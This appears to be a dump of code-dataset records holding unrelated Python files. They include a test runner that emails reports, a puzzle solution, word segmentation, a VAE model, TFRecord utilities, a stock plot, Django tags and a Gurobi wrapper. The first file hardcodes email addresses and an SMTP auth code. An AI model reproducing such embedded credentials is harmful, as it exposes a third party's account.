sharetoQQ_test_cases,webview_test_cases,])\n    return suite\n\ndef send_report(filePath):\n    with open(filePath, \"rb\") as file:\n        content = file.read()\n    mailinfo = {\n        \"sender\": \"xiaobai1q@163.com\",\n        \"receiver\": 'xiaobairena1q@163.com,598520439@qq.com',\n        \"mailserver\":
\"smtp.163.com\",\n \"subject\": \"登陆测试用例执行结果\",\n \"subtype\": \"html\",\n \"charset\": \"utf-8\",\n \"content\": content,\n \"auth_code\": \"gexiaoyan123456\",\n \"filename\": \"osc_app_test_result.html\"\n }\n utils = MailUtils(mailinfo)\n utils.send_mail()\n\n\nif __name__ == '__main__':\n suite = getSuite()\n filePath = PROJECT_PATH+os.sep+\"testReport\"+os.sep+time.strftime(\"%Y-%m-%d %H_%M_%S\", time.localtime()) + \"_osc_app_result.html\"\n with open(filePath, \"wb\") as file:\n runner = HTMLTestRunner(stream=file, verbosity=2, title=\"开源中国app测试报告\", description=\"登陆测试用例执行结果:\")\n runner.run(suite)\n send_report(filePath)\n\n\n","sub_path":"testcases/TestCasesSuite.py","file_name":"TestCasesSuite.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"392500931","text":"import datetime as dt\n\n\ndef solution(n, t, m, timetable):\n buses = [[dt.time(hour=9).replace(hour=9+(t*i//60), minute=(t*i) % 60), m, []] for i in range(n)]\n timetable.sort()\n crews = [dt.time.fromisoformat(tmtb) if tmtb != '24:00' else dt.time(hour=0, minute=0) for tmtb in timetable]\n for idx, crew in enumerate(crews):\n for bus in buses:\n if bus[1] > 0 and bus[0] >= crew:\n bus[1] -= 1\n bus[2].append(idx)\n break\n \n # 마지막 버스에 자리가 있다 / 없다\n if buses[-1][1] == 0:\n last_ride_crew = buses[-1][2][-1]\n tmp = crews[last_ride_crew].isoformat()\n \n tmp_h, tmp_m, _ = map(int, tmp.split(':'))\n if tmp_m == 0:\n tmp_h, tmp_m = tmp_h-1, 59\n else:\n tmp_m -= 1\n answer = dt.time(hour=tmp_h, minute=tmp_m).isoformat()[:-3]\n else:\n answer = buses[-1][0].isoformat()[:-3]\n \n return answer\n \n\nn = 1\nt = 1\nm = 5\ntimetable = [\"08:00\", \"08:01\", \"08:02\", \"08:03\"]\nprint(solution(n, t, m, timetable))\n","sub_path":"Programmers/연습문제/Level 3/[1차] 셔틀버스.py","file_name":"[1차] 셔틀버스.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"558085112","text":"#分词方法:最大正向切分的第一种实现方式\n\nimport re\nimport time\n\n#加载词典\ndef load_word_dict(path):\n max_word_length = 0\n word_dict = {} #用set也是可以的。用list会很慢\n with open(path, encoding=\"utf8\") as f:\n for line in f:\n word = line.split()[0]\n word_dict[word] = 0\n max_word_length = max(max_word_length, len(word))\n return word_dict, max_word_length\n\n#先确定最大词长度\n#从长向短查找是否有匹配的词\n#找到后移动窗口\ndef cut_method1(string, word_dict, max_len):\n words = []\n while string != '':\n lens = min(max_len, len(string))\n word = string[:lens]\n while word not in word_dict:\n if len(word) == 1:\n break\n word = word[:len(word) - 1]\n words.append(word)\n string = string[len(word):]\n return words\n\n#cut_method是切割函数\n#output_path是输出路径\ndef main(cut_method, input_path, output_path):\n word_dict, max_word_length = load_word_dict(\"dict.txt\")\n writer = open(output_path, \"w\", encoding=\"utf8\")\n start_time = time.time()\n with open(input_path, encoding=\"utf8\") as f:\n for line in f:\n words = cut_method(line.strip(), word_dict, max_word_length)\n writer.write(\" / \".join(words) + \"\\n\")\n writer.close()\n print(\"耗时:\", time.time() - start_time)\n return\n\n\nstring = \"测试字符串\"\nword_dict, max_len = load_word_dict(\"dict.txt\")\n# print(cut_method1(string, word_dict, max_len))\n\nmain(cut_method1, \"corpus.txt\", 
\"cut_method1_output.txt\")\n","sub_path":"125-吕军-北京/week03/forward_segmentation_method1.py","file_name":"forward_segmentation_method1.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"426417982","text":"import numpy as np\nimport tensorflow as tf\nfrom tensorflow.python import array_ops, keras\n\nfrom odin.bay.random_variable import RandomVariable as RV\nfrom odin.bay.vi.autoencoder.beta_vae import BetaVAE\n\n\nclass MultitaskVAE(BetaVAE):\n r\"\"\" Multi-tasks VAE for semi-supervised learning\n\n Example:\n\n ```\n from odin.fuel import MNIST\n from odin.bay.vi.autoencoder import MultitaskVAE\n\n # load the dataset, include 50% of the labels for semi-supervised objective\n ds = MNIST()\n train = ds.create_dataset(partition='train', inc_labels=0.5)\n\n # create and train the model\n vae = MultitaskVAE(encoder='mnist',\n outputs=RV((28, 28, 1),\n 'bern',\n projection=False,\n name=\"Image\"),\n labels=RV(10, 'onehot', projection=True, name=\"Digit\"))\n vae.fit(train, epochs=-1, max_iter=8000, compile_graph=True, sample_shape=1)\n ```\n \"\"\"\n\n def __init__(self,\n outputs=RV(64, 'gaussian', projection=True, name=\"Input\"),\n labels=RV(10, 'onehot', projection=True, name=\"Label\"),\n alpha=10.,\n beta=1.,\n **kwargs):\n labels = tf.nest.flatten(labels)\n outputs = tf.nest.flatten(outputs)\n outputs += labels\n super().__init__(beta=beta, outputs=outputs, **kwargs)\n self.labels = labels\n self.alpha = alpha\n\n @property\n def alpha(self):\n return self._alpha\n\n @alpha.setter\n def alpha(self, a):\n self._alpha = tf.convert_to_tensor(a, dtype=self.dtype, name='alpha')\n\n def encode(self, inputs, training=None, mask=None, sample_shape=(), **kwargs):\n n_outputs = len(self.output_layers)\n n_semi = len(self.labels)\n inputs = tf.nest.flatten(inputs)[:(n_outputs - n_semi)]\n if len(inputs) == 1:\n inputs = inputs[0]\n return super().encode(inputs,\n training=training,\n mask=mask,\n sample_shape=sample_shape,\n **kwargs)\n\n def _elbo(self, inputs, pX_Z, qZ_X, analytic, reverse, sample_shape, mask,\n training, **kwargs):\n n_semi = len(self.labels)\n # unsupervised ELBO\n llk, div = super()._elbo(inputs,\n pX_Z[:-n_semi],\n qZ_X,\n analytic=analytic,\n reverse=reverse,\n sample_shape=sample_shape,\n mask=mask,\n training=training,\n **kwargs)\n # supervised log-likelihood\n if len(inputs) > len(self.output_layers) - n_semi:\n Y = inputs[-n_semi:]\n pY_Z = pX_Z[-n_semi:]\n mask = tf.nest.flatten(mask)\n if len(mask) == 1:\n mask = mask * n_semi\n # iterate over each pair\n for layer, y, py, m in zip(self.output_layers[-n_semi:], Y, pY_Z, mask):\n name = layer.name\n lk_y = py.log_prob(y)\n if m is not None:\n m = tf.reshape(m, (-1,))\n # take into account the sample_shape by transpose the batch dim to\n # the first dimension\n # need to check the mask here, otherwise the loss can be NaN\n lk_y = tf.cond(\n tf.reduce_all(tf.logical_not(m)),\n lambda: 0.,\n lambda: tf.transpose(\n tf.boolean_mask(tf.transpose(lk_y), m, axis=0)),\n )\n # this is important, if loss=0 when using one-hot log_prob,\n # the gradient is NaN\n loss = tf.reduce_mean(self.alpha * lk_y)\n loss = tf.cond(\n tf.abs(loss) < 1e-8, lambda: tf.stop_gradient(loss), lambda: loss)\n llk[\"llk_%s\" % name] = loss\n # print(llk, div)\n return llk, div\n\n @property\n def is_semi_supervised(self):\n return True\n\n\nclass MultiheadVAE(MultitaskVAE):\n r\"\"\" A same multi-outputs design as `MultitaskVAE`, however, the\n 
semi-supervised heads are directly connected to the latent layers to\n exert influences. \"\"\"\n\n def __init__(self,\n outputs=RV(64, 'gaussian', projection=True, name=\"Input\"),\n labels=RV(10, 'onehot', projection=True, name=\"Label\"),\n alpha=10.,\n beta=1.,\n **kwargs):\n super().__init__(alpha=alpha,\n beta=beta,\n outputs=outputs,\n labels=[],\n **kwargs)\n # create and build the semi-supervised output layers\n self.labels = tf.nest.flatten(labels)\n z = keras.Input(shape=self.latent_shape[1:], batch_size=None)\n semi_layers = [\n l.create_posterior(self.latent_shape[1:]) for l in self.labels\n ]\n for layer in semi_layers:\n layer(z)\n # add to the main output layers\n self.output_layers += semi_layers\n\n @property\n def is_semi_supervised(self):\n return True\n\n def decode(self,\n latents,\n training=None,\n mask=None,\n sample_shape=(),\n **kwargs):\n n_semi = len(self.labels)\n semi_layers = self.output_layers[-n_semi:]\n self.output_layers = self.output_layers[:-n_semi]\n # unsupervised outputs\n pX = super().decode(latents, training, mask, sample_shape, **kwargs)\n # semi outputs\n pY = [layer(latents, training=training, mask=mask) for layer in semi_layers]\n for p in pY: # remember to store the keras mask in outputs\n p._keras_mask = mask\n # recover and return\n self.output_layers = self.output_layers + semi_layers\n return tf.nest.flatten(pX) + pY\n","sub_path":"odin/bay/vi/autoencoder/multitask_vae.py","file_name":"multitask_vae.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"507894975","text":"import aiohttp.web\nimport asyncio\nimport functools\nimport aiohttp_session\nimport aiohttp_session.cookie_storage\n\n\nclass Mead():\n\n def __init__(self, router=None, session_encrypt_key=None):\n self.app = aiohttp.web.Application()\n self.router = router\n self.session_encrypt_key = session_encrypt_key\n\n\n async def init(self, loop, address, port):\n handler = self.app.make_handler()\n for method, path, obj in self.router:\n self.app.router.add_route(method, path, obj)\n srv = await loop.create_server(handler, address, port)\n aiohttp_session.setup(self.app, aiohttp_session.cookie_storage.EncryptedCookieStorage(self.session_encrypt_key))\n return srv, handler\n\n\n def serve(self, port=8080, address=\"127.0.0.1\"):\n print(\"Starting on http://{}:{}\".format(address, port))\n loop = asyncio.get_event_loop()\n self.app._loop = loop\n\n srv, handler = loop.run_until_complete(self.init(loop, address, port))\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n loop.run_until_complete(handler.finish_connections())\n","sub_path":"mead/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"449310845","text":"__url__ = \"https://www.hackerrank.com/challenges/detect-html-tags-attributes-and-attribute-values/problem\"\n\nfrom html.parser import HTMLParser\n\nclass MyHTMLParser(HTMLParser):\n def handle_starttag(self, tag, attrs):\n print(tag)\n for attr in attrs:\n print(\"-> {} > {}\".format(attr[0], attr[1]))\n\n def handle_startendtag(self, tag, attrs):\n print(tag)\n for attr in attrs:\n print(\"-> {} > {}\".format(attr[0], attr[1]))\n\n\nn = int(input())\ntext = \"\"\nfor _ in range(n):\n text += input()\n\nparser = MyHTMLParser()\nparser.feed(text)\n","sub_path":"Python 
Practice/Detect_HTML_Tags.py","file_name":"Detect_HTML_Tags.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"467679380","text":"\"\"\"#,bga\npython3 k3/misc/basic_graphics_test.py\n#,bgb\"\"\"\n\nfrom k3 import *\n\nclear_screen()\ncr('r')\ncg('g')\ncb('b')\nclp('testing','`rgb','various','`ybu','colors','`m')\n\nraw_enter()\n\na = z55(rndn(64,64,3))\nimg_path = opjD('temp.jpg')\nimsave(img_path,a)\nb = imread(img_path)\n\nmi(b)\nmci(b,scale=4)\n\nraw_enter();CA()\n\nos.system('rm '+img_path)\n\nhist(rndn(10000))\nspause()\nraw_enter();CA()\n\nxy = rndn(1000,2)\npts_plot(xy)\nplt_square()\nspause()\nraw_enter();CA()\n#,a\nprint('cv2 test')\nfor k in range(3):\n\tprint(k)\n\tfor i in range(0,100,1):\n\t\tm = z55(rndn(100,100,3))\n\t\tm = m // 2\n\t\tm[i,:,:] = (255,0,0)\n\t\tj = (k+1)*i\n\t\twhile j >= 100:\n\t\t\tj = j - 99\n\t\tm[:,j,:] = (0,255,0)\n\t\t#m[i,i,:] = 255\n\t\td = 1000//30\n\t\t#if i == 50:\n\t\t#\td = 1000\n\t\tmci(m,delay=d,scale=4,)\n\t\t#time.sleep(1/15)\n\nraw_enter()\nCA()\n#,b\n\n#EOF\n\n","sub_path":"misc/basic_graphics_test.py","file_name":"basic_graphics_test.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"653282828","text":"\"\"\" Data Utils\n\nReference:\nhttps://github.com/changjo/stanford-tensorflow-tutorials/blob/master/examples/09_tfrecord_example.py\nhttps://github.com/balancap/SSD-Tensorflow/blob/master/datasets/pascalvoc_to_tfrecords.py\n\"\"\"\n\nfrom PIL import Image\nimport numpy as np\nimport tensorflow as tf\nimport scipy.misc\nimport matplotlib.pyplot as plt\nimport random\nimport os, sys\n\nDIRECTORY_IMAGES = 'images/'\nDIRECTORY_LABELS = 'labels/'\n\n# TFRecords 변환 파라미터.\nRANDOM_SEED = 4242\nSAMPLES_PER_FILE = 200\nCOLOR_CHANNELS = 3\nIN_SIZE = 224\n\n\ndef _int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef get_image(filename):\n image = Image.open(filename)\n image = np.asarray(image, np.uint8)\n shape = np.array(image.shape, np.int32)\n height, width, depth = shape[0], shape[1], shape[2]\n shape = (height, width, depth)\n\n return image, shape\n\n\ndef get_label_int(filename):\n if not os.path.isfile(filename):\n return -1\n with open(filename, 'r') as f:\n for line in f:\n line = line.strip()\n if len(line) != 0:\n label = int(line)\n return label\n\n\ndef _convert_to_example(label, shape, binary_image):\n example = tf.train.Example(features=tf.train.Features(feature={\n 'image': _bytes_feature(binary_image),\n 'label': _int64_feature(label),\n 'height': _int64_feature(shape[0]),\n 'width': _int64_feature(shape[1]),\n 'depth': _int64_feature(shape[2])\n }))\n return example\n\n\ndef _add_to_tfrecord(dataset_dir, filename, tfrecord_writer):\n name, ext = os.path.splitext(filename)\n image_file = os.path.join(dataset_dir, DIRECTORY_IMAGES, name + ext)\n image, shape = get_image(image_file)\n image = scipy.misc.imresize(image, (IN_SIZE, IN_SIZE))\n binary_image = image.tobytes()\n\n label_file = os.path.join(dataset_dir, DIRECTORY_LABELS, name + '.txt')\n label = get_label_int(label_file)\n\n example = _convert_to_example(label, shape, binary_image)\n tfrecord_writer.write(example.SerializeToString())\n\n\ndef _get_output_filename(output_dir, name, idx):\n return '%s/%s_%03d.tfrecord' % 
(output_dir, name, idx)\n\n\ndef convert_to_tfrecord(dataset_dir, output_dir, name=\"output\", shuffling=False):\n if not tf.gfile.Exists(output_dir):\n tf.gfile.MakeDirs(output_dir)\n\n path = os.path.join(dataset_dir, DIRECTORY_LABELS)\n filenames = sorted(os.listdir(path))\n if shuffling:\n random.seed(RANDOM_SEED)\n random.shuffle(filenames)\n\n # Process dataset files.\n i = 0\n tfrecord_idx = 0\n while i < len(filenames):\n tfrecord_file = _get_output_filename(output_dir, name, tfrecord_idx)\n with tf.python_io.TFRecordWriter(tfrecord_file) as writer:\n j = 0\n while j < SAMPLES_PER_FILE and i < len(filenames):\n sys.stdout.write('\\r>> Converting image %d/%d' % (i + 1, len(filenames)))\n\n filename = filenames[i]\n _add_to_tfrecord(dataset_dir, filename, writer)\n\n i += 1\n j += 1\n tfrecord_idx += 1\n\n\ndef read_from_tfrecord(filenames):\n tfrecord_file_queue = tf.train.string_input_producer(filenames, name='queue')\n reader = tf.TFRecordReader()\n _, tfrecord_serialized = reader.read(tfrecord_file_queue)\n tfrecord_features = tf.parse_single_example(tfrecord_serialized,\n features={\n 'image': tf.FixedLenFeature([], tf.string),\n 'label': tf.FixedLenFeature([], tf.int64),\n 'height': tf.FixedLenFeature([], tf.int64),\n 'width': tf.FixedLenFeature([], tf.int64),\n 'depth': tf.FixedLenFeature([], tf.int64)\n }, name='features')\n\n image = tf.decode_raw(tfrecord_features['image'], tf.uint8)\n label = tf.cast(tfrecord_features['label'], tf.int32)\n height = tf.cast(tfrecord_features['height'], tf.int32)\n width = tf.cast(tfrecord_features['width'], tf.int32)\n depth = tf.cast(tfrecord_features['depth'], tf.int32)\n # the image tensor is flatterned out, so we have to reconstruct the shape.\n image = tf.reshape(image, [height, width, depth])\n\n return image, label, height, width, depth\n\n\ndef read_and_decode(tfrecord_file_queue):\n reader = tf.TFRecordReader()\n _, tfrecord_serialized = reader.read(tfrecord_file_queue)\n tfrecord_features = tf.parse_single_example(tfrecord_serialized,\n features={\n 'image': tf.FixedLenFeature([], tf.string),\n 'label': tf.FixedLenFeature([], tf.int64),\n 'height': tf.FixedLenFeature([], tf.int64),\n 'width': tf.FixedLenFeature([], tf.int64),\n 'depth': tf.FixedLenFeature([], tf.int64)\n }, name='features')\n\n image = tf.decode_raw(tfrecord_features['image'], tf.uint8)\n label = tf.cast(tfrecord_features['label'], tf.int32)\n height = tf.cast(tfrecord_features['height'], tf.int32)\n width = tf.cast(tfrecord_features['width'], tf.int32)\n depth = tf.cast(tfrecord_features['depth'], tf.int32)\n # the image tensor is flatterned out, so we have to reconstruct the shape.\n image = tf.cast(image, tf.float32) * (1. 
/ 255)\n shape = [height, width, COLOR_CHANNELS]\n image = tf.reshape(image, shape)\n\n return image, label, shape\n\n\ndef read_tfrecord(tfrecord_file):\n image, label, height, width, depth = read_from_tfrecord([tfrecord_file])\n with tf.Session() as sess:\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n # label, image, shape = sess.run([label, image, shape])\n im, la, h, w, d = sess.run([image, label, height, width, depth])\n coord.request_stop()\n coord.join(threads)\n\n print(la)\n print(im)\n print(h, w, d)\n plt.imshow(im)\n plt.show()\n\n\n# From \"https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/how_tos/reading_data/fully_connected_reader.py\"\ndef inputs_old(filename, batch_size, num_epochs):\n \"\"\"Reads input data num_epochs times.\n Args:\n train: Selects between the training (True) and validation (False) data.\n batch_size: Number of examples per returned batch.\n num_epochs: Number of times to read the input data, or 0/None to\n train forever.\n Returns:\n A tuple (images, labels), where:\n * images is a float tensor with shape [batch_size, mnist.IMAGE_PIXELS]\n in the range [-0.5, 0.5].\n * labels is an int32 tensor with shape [batch_size] with the true label,\n a number in the range [0, mnist.NUM_CLASSES).\n Note that an tf.train.QueueRunner is added to the graph, which\n must be run using e.g. tf.train.start_queue_runners().\n \"\"\"\n if not num_epochs: num_epochs = None\n\n with tf.name_scope('input'):\n tfrecord_file_queue = tf.train.string_input_producer([filename], num_epochs=num_epochs, name='queue')\n\n # Even when reading in multiple threads, share the filename\n # queue.\n image, label, shape = read_and_decode(tfrecord_file_queue)\n # Shuffle the examples and collect them into batch_size batches.\n # (Internally uses a RandomShuffleQueue.)\n # We run this in two threads to avoid being a bottleneck.\n # images, sparse_labels = tf.train.shuffle_batch(\n # [image, label], batch_size=batch_size, num_threads=2,\n # capacity=1000 + 3 * batch_size, min_after_dequeue=1000)\n image = image_preprocess(image)\n # image = tf.image.resize_images(image, [googlenet.IN_SIZE, googlenet.IN_SIZE])\n # image = tf.random_crop(image, [googlenet.IN_SIZE, googlenet.IN_SIZE, 3])\n\n # Flatten an image.\n #image = tf.reshape(image, [googlenet.IN_SIZE, googlenet.IN_SIZE, COLOR_CHANNELS])\n images, sparse_labels = tf.train.batch([image, label], batch_size=batch_size, num_threads=2,\n capacity=1000 + 3 * batch_size)\n\n return images, sparse_labels\n\n\ndef inputs(filenames, batch_size, num_epochs):\n\n dataset = tf.data.TFRecordDataset(filenames)\n\n def parser(record):\n keys_to_features = {'image': tf.FixedLenFeature((), tf.string),\n 'label': tf.FixedLenFeature((), tf.int64),\n 'height': tf.FixedLenFeature((), tf.int64),\n 'width': tf.FixedLenFeature((), tf.int64),\n 'depth': tf.FixedLenFeature((), tf.int64)\n }\n parsed = tf.parse_single_example(record, keys_to_features)\n image = tf.decode_raw(parsed['image'], tf.uint8)\n image = tf.cast(image, tf.float32) * (1. 
/ 255)\n height = tf.cast(parsed['height'], tf.int32)\n width = tf.cast(parsed['width'], tf.int32)\n depth = tf.cast(parsed['depth'], tf.int32)\n image = tf.reshape(image, [IN_SIZE, IN_SIZE, COLOR_CHANNELS])\n\n #image = image_preprocess(image)\n label = tf.cast(parsed['label'], tf.int32)\n\n return image, label\n\n dataset = dataset.map(parser)\n dataset = dataset.shuffle(buffer_size=10000)\n dataset = dataset.batch(batch_size)\n dataset = dataset.repeat(num_epochs)\n iterator = dataset.make_one_shot_iterator()\n\n images, labels = iterator.get_next()\n\n return images, labels\n\n\ndef image_preprocess(images):\n images = tf.image.resize_images(images, [IN_SIZE, IN_SIZE])\n return images\n\n\ndef main():\n dataset_dir = 'data/'\n output_dir = './tfrecords'\n name = 'our'\n # convert_to_tfrecord(dataset_dir=dataset_dir, output_dir=output_dir, name=name, shuffling=False)\n tfrecord_file = os.path.join(output_dir, name + '_000.tfrecord')\n # read_tfrecord(tfrecord_file)\n images, labels = inputs([tfrecord_file], batch_size=2, num_epochs=None)\n\n with tf.Session() as sess:\n im, la = sess.run([images, labels])\n\n print(la[0])\n print(im[0])\n plt.imshow(im[0])\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"people_classification/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":10625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"101317990","text":"import pandas as pd\nimport datetime\nimport matplotlib.pyplot as plt \nimport numpy as np\nfrom pandas_datareader import data, wb\nfrom sklearn import datasets, linear_model\n#import statsmodels.formula.api as sm\n#from pandas.io import wb\n#import pandas.io.data as web \n#from pandas_datareader import data as web\n\napple = pd.DataFrame.from_csv(\"apple.csv\")\nmicrosoft = pd.DataFrame.from_csv(\"microsoft.csv\")\n\nprint(apple.head())\nprint(microsoft.head())\n\n#Printing pure data\napp = apple[\"Adj Close\"].values\nmic = microsoft[\"Adj Close\"].values\nprint(\"Pure data series\")\nprint(app)\nprint(mic)\n\n#number of datapoints\nn = microsoft[\"Adj Close\"].values.shape[0]\n\nEapp = app.sum()/n\nEmic = mic.sum()/n\n\nprint(\"Average prices\")\nprint(\"Apple\")\nprint(Eapp)\nprint(\"Microsoft\")\nprint(Emic)\n\n#Standard deviation and variance\nvarappl = 0\nfor i in range(n):\n\tvarappl += (app[i]-Eapp)**2/n\nstdappl = np.sqrt(varappl)\n\nvarmic = 0\nfor i in range(n):\n\tvarmic += (mic[i]-Emic)**2/n\nstdmic = np.sqrt(varmic)\n\n\nprint(\"standard deviation apple = {}\".format(stdappl))\nprint(\"standard deviation microsoft = {}\".format(stdmic))\n\n#Covariance and correlation\nCov = 0\nfor i in range(n):\n\tCov += (app[i]-Eapp)*(mic[i]-Emic)/n\nprint(\"Covariance = {0}\".format(Cov))\nprint(\"Correlation = {}\".format(Cov/(stdmic*stdappl)))\n\n\n\n# plt.figure(0)\n# plt.hold(True)\n# apple[\"Adj Close\"].plot(grid = True)\n# microsoft[\"Adj Close\"].plot(grid = True)\n# plt.ylabel('Adjusted closing Price $')\n# plt.legend(['Apple','Microsoft'],loc='upper center', ncol=2,bbox_to_anchor=(0.5,1.1))\n# plt.show()\n\n\n#lienar regression\n#sklearn needs a shape (n,1) and not (n,) which is usual... 
so we need to reshape\nxdata = np.linspace(0,n,n)\nxdata = xdata.reshape((n,1))\napp = app.reshape((n,1))\nmic = mic.reshape((n,1))\n\nregr = linear_model.LinearRegression()\nregr.fit(xdata, app)\n\nregr2 = linear_model.LinearRegression()\nregr2.fit(xdata, mic)\n\n\nfig = plt.figure(1)\nplt.hold(True)\nline1, = plt.plot(xdata,app,color='blue')\nplt.plot(xdata, regr.predict(xdata), color='blue', linewidth=3)\nline2, = plt.plot(xdata,mic,color='green')\nplt.plot(xdata, regr2.predict(xdata), color='green', linewidth=3)\nplt.ylabel('Adjusted closing Price $')\nplt.title('Corr={0}'.format(Cov/(stdmic*stdappl)))\nplt.legend([line1,line2],['Apple','Microsoft'])\nplt.xlabel('x [time]')\nplt.show()\n\nfig.savefig('linreg.png', bbox_inches='tight')","sub_path":"stockplot.py","file_name":"stockplot.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"63662813","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 27 16:05:15 2015\n\n@author: paulsalessi\n\"\"\"\n\nimport pandas as pd\nimport json\n\nSTUDENT_DATA = \"data_files/mapped_student_data.csv\"\n\nstudents = pd.read_csv(STUDENT_DATA, sep=\"\\t\")\n\ncity_data = dict(students.City.value_counts())\n\njson_obj = []\n\nfor city in city_data.keys():\n city_long = list(students[students[\"City\"] == city][\"Longitude\"])[0]\n city_lat = list(students[students[\"City\"] == city][\"Latitude\"])[0]\n\n city_count = city_data[city]\n \n json_obj.append({\"coordinates\":[city_lat,city_long], \"count\":city_count, \"name\":city})\n\nwith open(\"data_files/city_data.json\",\"w\") as json_data: \n json_data.write(json.dumps(json_obj))\n","sub_path":"source/get_city_json.py","file_name":"get_city_json.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"425628185","text":"from django import template\n\nregister = template.Library()\n\n\n@register.simple_tag(name=\"yimi\")\ndef my_sum(arg1, arg2, arg3):\n return \"{} {} {}\".format(arg1, arg2, arg3)\n\n\n@register.inclusion_tag('results.html')\ndef show_results(n):\n n = 1 if n < 1 else int(n)\n data = [\"第{}项\".format(i) for i in range(1, n+1)]\n return {\"results\": data}\n","sub_path":"Django/进阶部分/day67/day67课上代码两个项目哦/day65/mysiteday65/app01/templatetags/mysimpletag.py","file_name":"mysimpletag.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"390753458","text":"#! 
/usr/bin/python\n\n# Copyright (c) 2019 Filippo Ranza \n\nimport os\n\n\ntry:\n import gurobipy\nexcept ImportError:\n # for test purposes\n pass\n\nfrom .solution import Solution, DebugData, get_solution_file_name\nfrom .config_loader import DEFAULT_CONF\n\nGUROBI_PARAMS = {\n \"TIME_LIMIT\": \"TimeLimit\",\n \"NUM_THREAD\": \"Threads\",\n \"MIP_GAP\": \"MIPGap\",\n}\n\n\ndef create_env(config, one_solution):\n env = gurobipy.Env()\n if not config[\"LOG\"]:\n env.setParam(\"OutputFlag\", 0)\n\n for k, v in GUROBI_PARAMS.items():\n def_val = DEFAULT_CONF[k]\n conf = config[k]\n if conf != def_val: \n env.setParam(v, conf)\n\n if one_solution:\n env.setParam(\"SolutionLimit\", 1)\n\n return env\n\n\nclass Model:\n def __init__(self, mps_file, config, linear_relax=False, one_solution=False):\n\n self.preload = config[\"PRELOAD\"]\n self.sol_file = get_solution_file_name(config.get(\"SOLUTION_FILE\"))\n self.model = gurobipy.read(mps_file, env=create_env(config, one_solution))\n self.relax = linear_relax\n self.stat = None\n if linear_relax:\n self.model = self.model.relax()\n\n\n def preload_from_file(self):\n if self.sol_file and os.path.isfile(self.sol_file):\n self.model.read(self.sol_file)\n\n\n def preload_solution(self, sol=None):\n if not self.preload or sol is None:\n return\n\n for name, value in sol.vars.items():\n self.model.getVarByName(name).start = value\n\n def run(self):\n self.model.optimize()\n stat = self.model.status\n self.stat = stat\n return stat == gurobipy.GRB.status.OPTIMAL\n\n def disable_variables(self, base_kernel, value=0):\n for name, _ in filter(lambda x: not x[1], base_kernel.items()):\n var = self.model.getVarByName(name)\n self.model.addConstr(var == value)\n\n def add_bucket_contraints(self, solution, bucket):\n self.model.addConstr(\n gurobipy.quicksum(self.model.getVarByName(var) for var in bucket) >= 1\n )\n if solution:\n self.model.setParam(\"Cutoff\", solution.value)\n\n def build_solution(self, prev_sol=None):\n gen = ((var.varName, var.x) for var in self.model.getVars())\n if prev_sol:\n prev_sol.update(self.model.objVal, gen)\n else:\n prev_sol = Solution(self.model.objVal, gen)\n\n return prev_sol\n\n def get_base_variables(self, null_value=0.0):\n gen = ((var.varName, var.x != null_value) for var in self.model.getVars())\n return dict(gen)\n\n def build_lp_solution(self, null_value=0.0):\n gen = self._lp_sol_generator(null_value)\n return Solution(self.model.objVal, gen)\n\n def _lp_sol_generator(self, null_value):\n for var in self.model.getVars():\n if var.x == null_value:\n yield var.varName, var.rc\n else:\n yield var.varName, var.x\n\n def build_debug(self, kernel_size, bucket_size):\n return DebugData(\n value=self.model.objVal,\n time=self.model.getAttr(\"Runtime\"),\n nodes=self.model.getAttr(\"NodeCount\"),\n kernel_size=kernel_size,\n bucket_size=bucket_size,\n )\n\n def model_size(self):\n tmp = self.model.getVars()\n return len(tmp)\n\n def reach_solution_limit(self):\n return self.stat == gurobipy.GRB.status.SOLUTION_LIMIT\n\n def reach_time_limit(self):\n return self.stat == gurobipy.GRB.status.TIME_LIMIT\n","sub_path":"ks_engine/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"249595937","text":"#!/bin/python\r\n\r\n#import matplotlib\r\n#matplotlib.use('TkAgg')\r\n#export DISPLAY=:0.0\r\nimport matplotlib.image as img\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import 
